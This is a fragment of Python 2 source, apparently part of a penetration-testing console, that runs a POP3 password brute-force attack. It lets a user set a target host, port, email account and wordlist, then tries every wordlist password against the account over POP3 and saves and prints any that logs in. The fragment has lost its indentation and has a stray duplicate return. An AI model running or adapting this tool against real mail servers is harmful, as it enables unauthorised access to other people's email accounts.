defaulthost = actions[11:]
d.change("target",defaulthost)
btpop3(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
btpop3(0)
elif actions[0:9] == "set email":
defaultaccount = actions[10:]
d.change("email",defaultaccount)
btpop3(0)
elif actions[0:10] == "set dict_1":
defaultdicc = actions[11:]
d.change("dict_1",defaultdicc)
btpop3(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
red=poplib.POP3(defaulthost, defaultport)
if True:
try:
d.loading_file()
try:
with open(defaultdicc,'r') as passs:
for ps in passs:
ps=ps.replace("\n","")
try:
red.user(defaultaccount)
red.pass_(ps)
if True:
ping.save("BruteForcePOP3",defaultaccount,ps)
d.Success(defaultaccount,ps)
btpop3(0)
except:
print " "+Alr+" Checking ("+defaultaccount+"="+ps+")"
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultdicc)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
btpop3(0)
